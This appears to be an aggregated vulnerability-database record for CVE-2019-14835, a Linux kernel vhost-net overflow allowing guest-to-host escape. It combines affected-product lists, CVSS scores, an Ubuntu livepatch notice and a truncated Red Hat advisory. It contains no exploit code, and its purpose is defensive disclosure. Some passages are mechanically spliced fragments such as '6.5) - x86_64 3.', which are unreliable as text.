Ubuntu 14.04 ESM: linux-image-3.13.0-173-generic 3.13.0-173.224 linux-image-3.13.0-173-generic-lpae 3.13.0-173.224 linux-image-3.13.0-173-lowlatency 3.13.0-173.224 linux-image-3.13.0-173-powerpc-e500 3.13.0-173.224 linux-image-3.13.0-173-powerpc-e500mc 3.13.0-173.224 linux-image-3.13.0-173-powerpc-smp 3.13.0-173.224 linux-image-3.13.0-173-powerpc64-emb 3.13.0-173.224 linux-image-3.13.0-173-powerpc64-smp 3.13.0-173.224 linux-image-4.15.0-1059-azure 4.15.0-1059.64~14.04.1 linux-image-4.4.0-1054-aws 4.4.0-1054.58 linux-image-4.4.0-164-generic 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-generic-lpae 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-lowlatency 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc-e500mc 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc-smp 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc64-emb 4.4.0-164.192~14.04.1 linux-image-4.4.0-164-powerpc64-smp 4.4.0-164.192~14.04.1 linux-image-aws 4.4.0.1054.55 linux-image-azure 4.15.0.1059.45 linux-image-generic 3.13.0.173.184 linux-image-generic-lpae 3.13.0.173.184 linux-image-generic-lpae-lts-xenial 4.4.0.164.143 linux-image-generic-lts-xenial 4.4.0.164.143 linux-image-lowlatency 3.13.0.173.184 linux-image-lowlatency-lts-xenial 4.4.0.164.143 linux-image-powerpc-e500 3.13.0.173.184 linux-image-powerpc-e500mc 3.13.0.173.184 linux-image-powerpc-e500mc-lts-xenial 4.4.0.164.143 linux-image-powerpc-smp 3.13.0.173.184 linux-image-powerpc-smp-lts-xenial 4.4.0.164.143 linux-image-powerpc64-emb 3.13.0.173.184 linux-image-powerpc64-emb-lts-xenial 4.4.0.164.143 linux-image-powerpc64-smp 3.13.0.173.184 linux-image-powerpc64-smp-lts-xenial 4.4.0.164.143 linux-image-server 3.13.0.173.184 linux-image-virtual 3.13.0.173.184 linux-image-virtual-lts-xenial 4.4.0.164.143
Ubuntu 12.04 ESM: linux-image-3.13.0-173-generic 3.13.0-173.224~12.04.1 linux-image-3.13.0-173-generic-lpae 3.13.0-173.224~12.04.1 linux-image-3.13.0-173-lowlatency 3.13.0-173.224~12.04.1 linux-image-3.2.0-143-generic 3.2.0-143.190 linux-image-3.2.0-143-generic-pae 3.2.0-143.190 linux-image-3.2.0-143-highbank 3.2.0-143.190 linux-image-3.2.0-143-omap 3.2.0-143.190 linux-image-3.2.0-143-powerpc-smp 3.2.0-143.190 linux-image-3.2.0-143-powerpc64-smp 3.2.0-143.190 linux-image-3.2.0-143-virtual 3.2.0-143.190 linux-image-generic 3.2.0.143.158 linux-image-generic-lpae-lts-trusty 3.13.0.173.161 linux-image-generic-lts-trusty 3.13.0.173.161 linux-image-generic-pae 3.2.0.143.158 linux-image-highbank 3.2.0.143.158 linux-image-omap 3.2.0.143.158 linux-image-powerpc 3.2.0.143.158 linux-image-powerpc-smp 3.2.0.143.158 linux-image-powerpc64-smp 3.2.0.143.158 linux-image-server 3.2.0.143.158 linux-image-virtual 3.2.0.143.158
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 7) - noarch, x86_64
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "3.16.74"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "19.04"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.4"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "imanager neteco 6000",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "v600r008c20"
},
{
"_id": null,
"model": "service processor",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.19"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.2"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.9"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "12.04"
},
{
"_id": null,
"model": "imanager neteco",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "v600r009c00"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "imanager neteco",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "v600r009c10spc200"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "manageone",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "6.5.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.5"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "18.04"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.2"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.0"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.6"
},
{
"_id": null,
"model": "openshift container platform",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "3.11"
},
{
"_id": null,
"model": "aff a700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.14"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.19.73"
},
{
"_id": null,
"model": "manageone",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "6.5.1rc1.b080"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 1.0,
"vendor": "linux",
"version": "5.3"
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.14.144"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "data availability services",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.9.193"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "14.04"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "29"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.4.193"
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "2.6.34"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7"
},
{
"_id": null,
"model": "manageone",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "6.5.1rc1.b060"
},
{
"_id": null,
"model": "manageone",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "6.5.0.spc100.b210"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "30"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "manageone",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "6.5.rc2.b050"
},
{
"_id": null,
"model": "virtualization host",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.2"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "16.04"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.2.15"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.5"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.1"
},
{
"_id": null,
"model": "imanager neteco 6000",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": "v600r008c10spc300"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14835"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "154602"
},
{
"db": "PACKETSTORM",
"id": "154565"
},
{
"db": "PACKETSTORM",
"id": "154538"
},
{
"db": "PACKETSTORM",
"id": "154659"
},
{
"db": "PACKETSTORM",
"id": "154540"
}
],
"trust": 0.5
},
"cve": "CVE-2019-14835",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14835",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-146821",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14835",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "secalert@redhat.com",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.6,
"id": "CVE-2019-14835",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14835",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "secalert@redhat.com",
"id": "CVE-2019-14835",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-146821",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146821"
},
{
"db": "NVD",
"id": "CVE-2019-14835"
},
{
"db": "NVD",
"id": "CVE-2019-14835"
}
]
},
"description": {
"_id": null,
"data": "A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way Linux kernel\u0027s vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. 6.5) - x86_64\n\n3. \n(CVE-2019-14835)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. ==========================================================================\nKernel Live Patch Security Notice 0058-1\nOctober 22, 2019\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu:\n\n| Series | Base kernel | Arch | flavors |\n|------------------+--------------+----------+------------------|\n| Ubuntu 18.04 LTS | 4.15.0 | amd64 | aws |\n| Ubuntu 18.04 LTS | 4.15.0 | amd64 | generic |\n| Ubuntu 18.04 LTS | 4.15.0 | amd64 | lowlatency |\n| Ubuntu 18.04 LTS | 4.15.0 | amd64 | oem |\n| Ubuntu 18.04 LTS | 5.0.0 | amd64 | azure |\n| Ubuntu 14.04 LTS | 4.4.0 | amd64 | generic |\n| Ubuntu 14.04 LTS | 4.4.0 | amd64 | lowlatency |\n| Ubuntu 16.04 LTS | 4.4.0 | amd64 | aws |\n| Ubuntu 16.04 LTS | 4.4.0 | amd64 | generic |\n| Ubuntu 16.04 LTS | 4.4.0 | amd64 | lowlatency |\n| Ubuntu 16.04 LTS | 4.15.0 | amd64 | azure |\n| Ubuntu 16.04 LTS | 4.15.0 | amd64 | generic |\n| Ubuntu 16.04 LTS | 4.15.0 | amd64 | lowlatency |\n\nSummary:\n\nSeveral 
security issues were fixed in the kernel. \n\nSoftware Description:\n- linux: Linux kernel\n\nDetails:\n\nIt was discovered that a race condition existed in the GFS2 file system in\nthe Linux kernel. A local attacker could possibly use this to cause a\ndenial of service (system crash). (CVE-2016-10905)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nIt was discovered that the USB gadget Midi driver in the Linux kernel\ncontained a double-free vulnerability when handling certain error\nconditions. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-20961)\n\nIt was discovered that the XFS file system in the Linux kernel did not\nproperly handle mount failures in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash) or execute\narbitrary code. (CVE-2018-20976)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\nhandle detach operations correctly, leading to a use-after-free\nvulnerability. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2018-21008)\n\nIt was discovered that the Intel Wi-Fi device driver in the Linux kernel\ndid not properly validate certain Tunneled Direct Link Setup (TDLS). A\nphysically proximate attacker could use this to cause a denial of service\n(Wi-Fi disconnect). (CVE-2019-0136)\n\nIt was discovered that the Linux kernel on ARM processors allowed a tracing\nprocess to modify a syscall after a seccomp decision had been made on that\nsyscall. A local attacker could possibly use this to bypass seccomp\nrestrictions. 
(CVE-2019-2054)\n\nIt was discovered that an integer overflow existed in the Binder\nimplementation of the Linux kernel, leading to a buffer overflow. A local\nattacker could use this to escalate privileges. (CVE-2019-2181)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux\nkernel did not properly validate the BSS descriptor. A local attacker could\npossibly use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. A local attacker\ncould use this to cause a denial of service. (CVE-2019-10207)\n\nJonathan Looney discovered that an integer overflow existed in the Linux\nkernel when handling TCP Selective Acknowledgments (SACKs). A remote\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-11477)\n\nJonathan Looney discovered that the TCP retransmission queue implementation\nin the Linux kernel could be fragmented when handling certain TCP Selective\nAcknowledgment (SACK) sequences. A remote attacker could use this to cause\na denial of service. (CVE-2019-11478)\n\nIt was discovered that the ext4 file system implementation in the Linux\nkernel did not properly zero out memory in some situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2019-11833)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel\ndid not properly check for allocation errors in some situations. A local\nattacker could possibly use this to cause a denial of service (system\ncrash). 
(CVE-2019-12614)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. A local attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A local\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-14284)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14814)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14815)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. A local attacker with write access to /dev/kvm could\nuse this to cause a denial of service (system crash). (CVE-2019-14821)\n\nPeter Pi discovered a buffer overflow in the virtio network backend\n(vhost_net) implementation in the Linux kernel. 
(CVE-2019-14835)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your livepatches to the following\nversions:\n\n| Kernel | Version | flavors |\n|--------------------------+----------+--------------------------|\n| 4.4.0-148.174 | 58.1 | lowlatency, generic |\n| 4.4.0-148.174~14.04.1 | 58.1 | lowlatency, generic |\n| 4.4.0-150.176 | 58.1 | generic, lowlatency |\n| 4.4.0-150.176~14.04.1 | 58.1 | lowlatency, generic |\n| 4.4.0-151.178 | 58.1 | lowlatency, generic |\n| 4.4.0-151.178~14.04.1 | 58.1 | generic, lowlatency |\n| 4.4.0-154.181 | 58.1 | lowlatency, generic |\n| 4.4.0-154.181~14.04.1 | 58.1 | generic, lowlatency |\n| 4.4.0-157.185 | 58.1 | lowlatency, generic |\n| 4.4.0-157.185~14.04.1 | 58.1 | generic, lowlatency |\n| 4.4.0-159.187 | 58.1 | lowlatency, generic |\n| 4.4.0-159.187~14.04.1 | 58.1 | generic, lowlatency |\n| 4.4.0-161.189 | 58.1 | lowlatency, generic |\n| 4.4.0-161.189~14.04.1 | 58.1 | lowlatency, generic |\n| 4.4.0-164.192 | 58.1 | lowlatency, generic |\n| 4.4.0-164.192~14.04.1 | 58.1 | lowlatency, generic |\n| 4.4.0-165.193 | 58.1 | generic, lowlatency |\n| 4.4.0-1083.93 | 58.1 | aws |\n| 4.4.0-1084.94 | 58.1 | aws |\n| 4.4.0-1085.96 | 58.1 | aws |\n| 4.4.0-1087.98 | 58.1 | aws |\n| 4.4.0-1088.99 | 58.1 | aws |\n| 4.4.0-1090.101 | 58.1 | aws |\n| 4.4.0-1092.103 | 58.1 | aws |\n| 4.4.0-1094.105 | 58.1 | aws |\n| 4.15.0-50.54 | 58.1 | generic, lowlatency |\n| 4.15.0-50.54~16.04.1 | 58.1 | generic, lowlatency |\n| 4.15.0-51.55 | 58.1 | generic, lowlatency |\n| 4.15.0-51.55~16.04.1 | 58.1 | generic, lowlatency |\n| 4.15.0-52.56 | 58.1 | lowlatency, generic |\n| 4.15.0-52.56~16.04.1 | 58.1 | generic, lowlatency |\n| 4.15.0-54.58 | 58.1 | generic, lowlatency |\n| 4.15.0-54.58~16.04.1 | 58.1 | generic, lowlatency |\n| 4.15.0-55.60 | 58.1 | generic, lowlatency |\n| 4.15.0-58.64 | 58.1 | generic, lowlatency |\n| 4.15.0-58.64~16.04.1 | 58.1 | lowlatency, generic |\n| 4.15.0-60.67 | 58.1 | lowlatency, generic |\n| 4.15.0-60.67~16.04.1 
| 58.1 | generic, lowlatency |\n| 4.15.0-62.69 | 58.1 | generic, lowlatency |\n| 4.15.0-62.69~16.04.1 | 58.1 | lowlatency, generic |\n| 4.15.0-64.73 | 58.1 | generic, lowlatency |\n| 4.15.0-64.73~16.04.1 | 58.1 | lowlatency, generic |\n| 4.15.0-65.74 | 58.1 | lowlatency, generic |\n| 4.15.0-1038.43 | 58.1 | oem |\n| 4.15.0-1039.41 | 58.1 | aws |\n| 4.15.0-1039.44 | 58.1 | oem |\n| 4.15.0-1040.42 | 58.1 | aws |\n| 4.15.0-1041.43 | 58.1 | aws |\n| 4.15.0-1043.45 | 58.1 | aws |\n| 4.15.0-1043.48 | 58.1 | oem |\n| 4.15.0-1044.46 | 58.1 | aws |\n| 4.15.0-1045.47 | 58.1 | aws |\n| 4.15.0-1045.50 | 58.1 | oem |\n| 4.15.0-1047.49 | 58.1 | aws |\n| 4.15.0-1047.51 | 58.1 | azure |\n| 4.15.0-1048.50 | 58.1 | aws |\n| 4.15.0-1049.54 | 58.1 | azure |\n| 4.15.0-1050.52 | 58.1 | aws |\n| 4.15.0-1050.55 | 58.1 | azure |\n| 4.15.0-1050.57 | 58.1 | oem |\n| 4.15.0-1051.53 | 58.1 | aws |\n| 4.15.0-1051.56 | 58.1 | azure |\n| 4.15.0-1052.57 | 58.1 | azure |\n| 4.15.0-1055.60 | 58.1 | azure |\n| 4.15.0-1056.61 | 58.1 | azure |\n| 4.15.0-1056.65 | 58.1 | oem |\n| 4.15.0-1057.62 | 58.1 | azure |\n| 4.15.0-1057.66 | 58.1 | oem |\n| 4.15.0-1059.64 | 58.1 | azure |\n| 5.0.0-1014.14~18.04.1 | 58.1 | azure |\n| 5.0.0-1016.17~18.04.1 | 58.1 | azure |\n| 5.0.0-1018.19~18.04.1 | 58.1 | azure |\n| 5.0.0-1020.21~18.04.1 | 58.1 | azure |\n\nSupport Information:\n\nKernels older than the levels listed below do not receive livepatch\nupdates. Please upgrade your kernel as soon as possible. 
\n\n| Series | Version | Flavors |\n|------------------+------------------+--------------------------|\n| Ubuntu 18.04 LTS | 4.15.0-1039 | aws |\n| Ubuntu 16.04 LTS | 4.4.0-1083 | aws |\n| Ubuntu 18.04 LTS | 5.0.0-1000 | azure |\n| Ubuntu 16.04 LTS | 4.15.0-1047 | azure |\n| Ubuntu 18.04 LTS | 4.15.0-50 | generic lowlatency |\n| Ubuntu 16.04 LTS | 4.15.0-50 | generic lowlatency |\n| Ubuntu 14.04 LTS | 4.4.0-148 | generic lowlatency |\n| Ubuntu 18.04 LTS | 4.15.0-1038 | oem |\n| Ubuntu 16.04 LTS | 4.4.0-148 | generic lowlatency |\n\nReferences:\n CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, \n CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, \n CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, \n CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, \n CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, \n CVE-2019-14821, CVE-2019-14835\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: kernel security update\nAdvisory ID: RHSA-2019:2866-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:2866\nIssue date: 2019-09-23\nCVE Names: CVE-2019-14835\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.5\nExtended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. 
Relevant releases/architectures:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.5) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 7.5) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 7.5) - ppc64, ppc64le, x86_64\n\n3. \n(CVE-2019-14835)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1750727 - CVE-2019-14835 kernel: vhost-net: guest to host kernel escape during migration\n\n6. Package List:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 